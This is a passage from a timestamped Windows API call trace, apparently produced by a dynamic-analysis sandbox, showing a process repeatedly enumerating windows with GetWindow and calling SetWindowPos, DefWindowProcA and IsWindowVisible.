uCmd=0x2) returned 0x1017e [0057.496] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.496] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.496] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.496] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.496] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.496] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.496] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.496] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.496] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.496] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.496] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.496] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.496] GetWindow (hWnd=0x10166, uCmd=0x2) returned 
0x10160 [0057.496] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.496] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.496] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.496] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.496] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.496] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.496] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.496] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.496] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.496] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.496] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.496] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.496] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.496] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.497] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.497] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.497] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.497] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.497] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.497] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.497] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.497] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.497] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.497] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.497] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.497] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.497] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.497] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.497] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.497] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.497] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.497] GetWindow (hWnd=0x20016, 
uCmd=0x2) returned 0x200ae [0057.497] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.497] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.497] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.497] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.497] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.497] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.497] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.497] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.497] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.497] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.497] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.497] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.497] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.497] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.498] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.498] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.498] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.498] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.498] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.498] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.498] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.498] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.498] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.498] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.498] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.498] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.498] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.498] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.498] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.498] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.498] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.498] 
GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.498] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.498] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.498] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.498] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.498] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.498] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.498] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.498] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.498] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.499] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.499] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.499] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.499] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.499] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.499] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.499] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.499] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.499] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.499] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.499] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.499] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.499] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.499] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.499] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.499] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.499] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.499] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.499] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.499] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.499] GetWindow 
(hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.499] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.499] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.499] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.499] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.499] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.499] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.499] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.499] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.499] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.500] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.500] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.500] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.500] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.500] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.500] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.500] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.500] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.500] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.500] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.500] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.500] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.500] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.500] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.500] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.500] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.500] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.500] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.500] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.500] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.500] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.500] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 
[0057.500] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.500] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.500] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.501] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.501] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.501] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.501] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.501] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.501] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.501] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.501] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.501] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.501] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.501] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.501] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.501] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.501] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.501] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.501] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.501] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.501] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.501] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.501] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.501] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.501] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.501] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.501] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.502] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.502] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.502] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.502] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.502] GetWindow (hWnd=0x1010c, uCmd=0x2) 
returned 0x2001e [0057.502] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.502] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.502] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.502] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.502] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.502] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.502] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.502] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.502] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.502] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.502] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.502] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.502] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.502] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.502] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.502] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.502] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.502] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.502] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.502] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.503] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.503] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.503] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.503] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.503] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.503] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.503] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.503] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.503] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.503] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.503] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.503] GetWindow 
(hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.503] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.503] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.503] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.503] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.503] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.503] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.503] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.503] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.503] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.503] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.504] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.504] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.504] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.504] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.504] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.504] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.504] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.504] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.504] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.504] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.504] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.504] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.504] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.504] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.504] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.504] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.504] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.504] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.504] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.504] GetWindow 
(hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.504] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.504] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.504] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.504] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.504] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.504] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.504] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.504] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.504] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.504] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.504] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.504] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.504] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.505] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.505] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.505] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.505] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.505] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.505] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.505] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.505] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.505] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.505] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.505] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.505] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.505] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.505] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.505] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.505] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.505] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.505] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.505] 
GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.505] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.505] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.505] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.505] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.505] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.505] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.505] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.505] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.505] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.505] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.505] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.505] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.506] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.506] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.506] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.506] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.506] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.506] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.506] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.506] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.506] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.506] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.506] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.506] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.506] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.506] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.506] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.506] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.506] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.506] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.506] GetWindow (hWnd=0x10122, uCmd=0x2) returned 
0x10120 [0057.506] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.506] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.506] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.506] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.506] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.506] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.506] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.506] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.506] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.506] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.506] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.506] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.507] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.507] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.507] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.507] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.507] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.507] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.507] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.507] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.507] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.507] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.507] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.507] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.507] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.507] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.507] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.507] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.508] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.508] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.508] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.508] GetWindow (hWnd=0x1004c, 
uCmd=0x2) returned 0x10038 [0057.508] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.508] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.508] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.508] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.508] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.508] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.508] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.508] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.508] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.508] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.508] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.508] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.508] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.508] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.508] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.508] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.508] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.508] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.508] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.508] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.509] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.509] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.509] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.509] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.509] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.509] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.509] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.509] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.509] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.509] GetWindow (hWnd=0x1003a, uCmd=0x2) 
returned 0x10040 [0057.509] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.509] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.509] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.509] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.509] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.509] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.509] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.509] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.509] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.509] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.509] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.509] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.509] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.509] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.509] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 